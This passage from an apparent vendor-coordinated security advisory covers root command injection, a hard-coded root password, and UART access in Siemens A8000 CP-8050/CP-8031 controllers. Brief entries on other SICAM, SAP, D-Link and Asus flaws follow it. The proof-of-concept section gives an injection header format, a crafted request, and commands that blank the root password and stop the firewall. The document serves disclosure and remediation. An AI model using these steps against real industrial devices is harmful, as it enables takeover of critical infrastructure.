prompt is provided. Proof of concept: ----------------- 1) Unauthenticated Remote Code Execution (CVE-2023-28489) To exploit this vulnerability, an HTTP request including the command must be crafted. No "/" characters can be used, therefore commands are encoded as base64, e.g., "id" as "aWQ=". The command must be provided as UPLOADFILENAME header. A full command looks as follows: ;echo aWQ=| base64 -d | sh # The following header format must be obeyed: * User-Agent: SICAM TOOLBOX II * Session-ID: [ARBITRARY 16 CHARACTERS] * UPLOADFILENAME: [COMMAND] Additionally, the request body must contain the following POST parameters: * type=20 * length=[ARBITRARY] * data=[ARBITRARY] A valid request can be seen below: ----------------------------------------------------------------------- [ POC request removed ] ----------------------------------------------------------------------- If it worked, the response body will be "type=21". Additionally, the output on the UART interface indicates code execution as root user: ----------------------------------------------------------------------- base64: /ies/IN/_: No such file or directory uid=0(root) gid=0(root) ----------------------------------------------------------------------- Subsequently, the SSH port can be opened by sending the following commands separately and encoded as base64 string. They will replace the set default root password hash with an empty password hash, reconfigure the Dropbear SSH daemon and stop the firewall: ----------------------------------------------------------------------- sed -i s'/:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo\/FWtDljQjCbm6JnZqxiMg re5P14Kv2zAH1:/:32BZgrJ3XBMoY:/' /etc/shadow sed -i s'/"$DROPBEAR_ARGS -R -s -g"/"$DROPBEAR_ARGS -R"/' /etc/init.d/dropbear /etc/init.d/dropbear restart /etc/init.d/rc.firewall stop ----------------------------------------------------------------------- After this, login via SSH as root is possible: ----------------------------------------------------------------------- ssh root@[IP] root@[IP]'s password: ~# id uid=0(root) gid=0(root) groups=0(root),10(wheel) ~# ----------------------------------------------------------------------- 2) Authenticated Command Injection (CVE-2023-33919) To trigger the command injection vulnerability, the payload must be set in the "LAN port group" field on the SICAM WEB page "Monitoring & Simulation" -> "Ethernet Packet Capture" section "Capture configuration" (other fields may also be affected). As the web interface only provides a drop-down menu, the payload must be set by manipulating the JavaScript logic or by directly manipulating the HTTP request as below, where "ping [IP]\nBBBBBBB" was set: ----------------------------------------------------------------------- POST /sicweb-ajax/rtum85/cview HTTP/1.1 Host: [HOST] User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/xml SICWEB-SID: xNG1v825qFmCMo8hpjfISlVARKipW1B+lz9d5FoBxipR87VT Content-Length: 198 Origin: http://[HOST] Connection: close Referer: http://[HOST]/ <?xml version="1.0" encoding="UTF-8"?> <Cmd_SetCustomViewValue><view id="packet_capture"><parameter id="p0"> <value> ping [IP] BBBBBBB</value> </parameter></view></Cmd_SetCustomViewValue> ----------------------------------------------------------------------- The line break in the payload is especially important, as the command is executed as part of a shell script. This script is generated and executed by pressing the "Start/Stop trace" button in the "Capture Controlling" section and saved as /tmp/incws_tcpdump.sh. An excerpt with the injected command is shown below: ----------------------------------------------------------------------- [...] # lets start tcpdump tcpdump -i ping [IP] BBBBBBB '(ether host 00:11:11:33:44:00) and (host 1.1.1.2 or host 2.2.2.34) and (port 999)' -C 1 -W 4 -U -w /var/log/wireshark.pcap & [...] ----------------------------------------------------------------------- The executed script creates a process running as root user, which can be seen by running "ps" on the device: ----------------------------------------------------------------------- root 1100 0.0 0.1 1784 1168 ? S Feb21 0:00 /bin/sh /etc/init.d/rc.sysinit root 1149 0.1 0.3 11768 1748 ? S1 Feb21 6:03 \_ /ies/apps/system/bin/ISV00.elf /ies/apps/sys_desc/target_rc.json [...] www-data 1487 0.0 0.6 7568 3444 ? S Feb21 0:40 \_ /usr/sbin/lighttpd -Df /etc/lighttpd/lighttpd.conf root 10655 0.0 0.2 1880 1344 ? S 04:55 0:00 \_ /bin/sh /tmp/incws_tcpdump.sh root 10667 0.0 0.2 1884 1360 ? S 04:57 0:00 \_ ping [IP] ----------------------------------------------------------------------- 3) Hard-coded Root Password (CVE-2023-33920) A hard-coded "root" user password hash can be found in the /etc/shadow file: ----------------------------------------------------------------------- root:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo/FWtDljQjCbm6JnZqxiMg re5P14Kv2zAH1:16436:0:99999:7::: ----------------------------------------------------------------------- 4) Console Login via UART (CVE-2023-33921) The serial console (UART) can be accessed on the backside of the PCB on two Vias. After removing an additional logic IC, receiving data and sending data is possible with the following UART settings: * Voltage: 3.3V * Speed: 115200 Baud * Symbol-ratio: 8 Data Bits 1 Stop Bit (8N1) Extensive boot log output can be received. Some output is shown below: ----------------------------------------------------------------------- U-Boot SPL 2013.01.01 (Jan 16 2020 - 12:56:02) BOARD : Altera SOCFPGA Cyclone V Board CLOCK: EOSC1 clock 50000 KHz [...] Starting IES system ----------------------------------- Welcome to SICAM IES ----------------------------------- Welcome to _______. __ ______ ___ .___ ___. Vulnerable / tested versions: ----------------------------- The following product has been tested: * Siemens A8000 CP-8050 04.92 * Siemens A8000 CP-8031 04.92 Vendor contact timeline: ------------------------ 2023-03-14: Contacting vendor through productcert@siemens.com, sending encrypted advisory 2023-03-29: Naming researchers involved 2023-03-31: Requesting state. Vulnerability 1 will be published first due to criticality. Rest will follow. 2023-04-11: Siemens releases advisory for unauthenticated RCE (Vulnerability 1, CVE-2023-28489) 2023-06-13: Siemens releases advisory for vulnerability 2, 3 and 4 (CVE-2023-33919, CVE-2023-33920, CVE-2023-33921) 2023-06-21: Siemens has additional feedback regarding the contents of the advisory. 2023-07-03: Release of security advisory. Solution: --------- Update to firmware CPCI85 V05 or later version, see vendor advisory for further information: https://cert-portal.siemens.com/productcert/html/ssa-472454.html https://cert-portal.siemens.com/productcert/html/ssa-731916.html Workaround: ----------- Restrict network access to the A8000 CP-8050/CP8031 module or disable the Toolbox II communication on port 80/443. Make sure to strictly limit physical access to the PLC during and also after its life cycle. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Stefan Viehböck, Christian Hager, Steffen Robertz, Gerhard Hechenberger, Gorazd Jank, Constantin Schieber-Knoebl / @2023

A vulnerability has been identified in SICAM P850 (7KG8500-0AA00-0AA0) (All versions < V3.11), SICAM P850 (7KG8500-0AA00-2AA0) (All versions < V3.11), SICAM P850 (7KG8500-0AA10-0AA0) (All versions < V3.11), SICAM P850 (7KG8500-0AA10-2AA0) (All versions < V3.11), SICAM P850 (7KG8500-0AA30-0AA0) (All versions < V3.11), SICAM P850 (7KG8500-0AA30-2AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA01-0AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA01-2AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA02-0AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA02-2AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA11-0AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA11-2AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA12-0AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA12-2AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA31-0AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA31-2AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA32-0AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA32-2AA0) (All versions < V3.11), SICAM P855 (7KG8550-0AA00-0AA0) (All versions < V3.11), SICAM P855 (7KG8550-0AA00-2AA0) (All versions < V3.11), SICAM P855 (7KG8550-0AA10-0AA0) (All versions < V3.11), SICAM P855 (7KG8550-0AA10-2AA0) (All versions < V3.11), SICAM P855 (7KG8550-0AA30-0AA0) (All versions < V3.11), SICAM P855 (7KG8550-0AA30-2AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA01-0AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA01-2AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA02-0AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA02-2AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA11-0AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA11-2AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA12-0AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA12-2AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA31-0AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA31-2AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA32-0AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA32-2AA0) (All versions < V3.11), SICAM T (All versions < V3.0). The web interface of the affected devices are vulnerable to Cross-Site Request Forgery attacks. By tricking an authenticated victim user to click a malicious link, an attacker could perform arbitrary actions on the device on behalf of the victim user. Siemens' q200 A cross-site request forgery vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. SICAM Q200 is a multifunctional device for detection, reporting and analysis of measured values ​​and events. A vulnerability has been identified in POWER METER SICAM Q200 family (All versions < V2.70)

SAP NetWeaver Enterprise Portal - version 7.50, does not sufficiently encode user-controlled inputs over the network, resulting in reflected Cross-Site Scripting (XSS) vulnerability, therefore changing the scope of the attack. On successful exploitation, an attacker can view or modify information causing a limited impact on confidentiality and integrity of the application.

D-Link DIR-600 Hardware Version B5, Firmware Version 2.18 was discovered to contain a stack overflow via the gena.cgi binary. D-Link DIR-600 is a wireless router made by China D-Link Company. There is a buffer overflow vulnerability in D-Link DIR-600 version 2.18. The vulnerability is caused by a boundary error in the file gena.cgi when processing untrusted input. Attackers can use this vulnerability to execute arbitrary code on the system or cause a denial of service attack

D-Link DIR-600 Hardware Version B5, Firmware Version 2.18 was discovered to contain a command injection vulnerability via the ST parameter in the lxmldbc_system() function. D-Link DIR-600 is a wireless router made by China D-Link Company. There is a command injection vulnerability in D-Link DIR-600. in constructing commands. An attacker could exploit this vulnerability to cause arbitrary command execution

A stored cross-site scripting (XSS) vulnerability in the urlFilterList function of Asus RT-N10LX Router v2.0.0.39 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the URL Keyword List text field. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. ASUSTeK Computer Inc. of rt-n10lx Firmware has a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. ASUS RT-N10LX is a router made by the Chinese company ASUS. ASUS RT-N10LX Router v2.0.0.39 has a cross-site scripting vulnerability. This vulnerability stems from the application's lack of effective filtering and escaping of user-provided data